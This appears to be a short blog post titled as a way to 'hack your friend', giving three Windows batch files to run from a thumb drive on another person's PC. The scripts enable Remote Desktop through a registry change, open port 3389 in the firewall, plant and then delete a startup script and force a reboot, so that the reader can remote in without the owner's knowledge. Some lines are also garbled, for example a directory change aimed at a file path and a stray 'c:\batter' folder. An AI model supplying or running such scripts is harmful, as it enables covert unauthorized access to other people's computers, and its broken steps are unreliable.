Hello friends, you want to hack your friend with scripts?
Your friend blocks the Remote Desktop Service (mstsc)?
So, here is solution for you....
You can hack your friends pc via Remote Desktop (mstsc).
But firstly you must manually run these scripts in your friends system.
(With in few days I will post a Software/Tool, that can remotely execute a script in system)
Make three .bat files in the same directory on a thumb drive:
First.bat
Code:
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
mkdir c:\tiger
copy Second.bat c:\tiger
copy Third.bat c:\tiger
cd %USERPROFILE%\Start Menu\programs\Startup\Start.bat
copy c:\tiger\Second.bat Start.bat
shutdown -r -t 0
Second.bat
Code:netsh firewall set portopening tcp 3389 "RemoteDesktop"
cd c:\batter
Third.bat
Third.bat
Code:
cd %USERPROFILE%\Start Menu\programs\Startup\
del Start.bat
This will enable remote desktop on that machine so that you may remote into it. Just run First.bat.
Enjoy....
0 comments:
Post a Comment